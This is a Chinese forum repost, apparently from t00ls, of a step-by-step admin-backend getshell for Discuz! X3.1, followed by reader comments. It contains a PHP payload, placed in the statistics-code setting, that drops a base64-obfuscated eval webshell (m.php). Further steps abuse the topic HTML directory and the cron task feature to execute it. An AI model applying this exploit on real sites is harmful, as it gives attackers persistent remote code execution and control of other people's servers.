转一个 Discuz! X3.1 20131122老版本 后台命令执行
https://www.t00ls.com/redirect.php?goto=findpost&ptid=26172&pid=414656
这里谈的……来自乌云的x3.1的老版本后台getshell,转到土司来,留个存档。
-----------------------------------------------------------------------------
总的来说,就是利用计划任务来执行php代码的。实现过程如下:
测试版本:Discuz! X3.1 Release 20131122
1.全局 » 站点信息:网站第三方统计代码里面插入:
<?php fputs(fopen('m.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));?>
2. 门户 » HTML管理 » 设置:
设置 专题HTML存放目录:source/include/cron
3.门户 » 专题管理 » 列表 » 创建专题,新建一个专题:
专题标题,随便写,静态化名称:test ,附加内容 选上 站点尾部信息然后提交。
4. 开启刚才创建的专题,然后生成:
5.工具 » 计划任务 » 新增: test ,然后提交。然后 编辑计划任务 - test,分钟:设置为:1 ,任务脚本:test.html , 然后 提交。
6.成功在根目录生成一句话 m.php
关于作者
评论11次
谢谢楼主 感觉方法很老的样子 现在估计不行了
discuz从来不缺少漏洞
dz2.5的思路。早已知道。
之前碰见过一个,专题HTML存放目录名写什么路径都非法。到现在都不晓得是什么原因。
我也遇到个这个,填写什么都非法
2.5不能成功,哭了
对DX研究得很深哟,进来看一下
之前碰见过一个,专题HTML存放目录名写什么路径都非法。 到现在都不晓得是什么原因。
这个还是可以借鉴学xi的、、、、、、、、、、、、、
先收藏了,或许那天用得上
碰到一个。估计是权限问题。没成功。
现在不得行了……公布那天就去试了。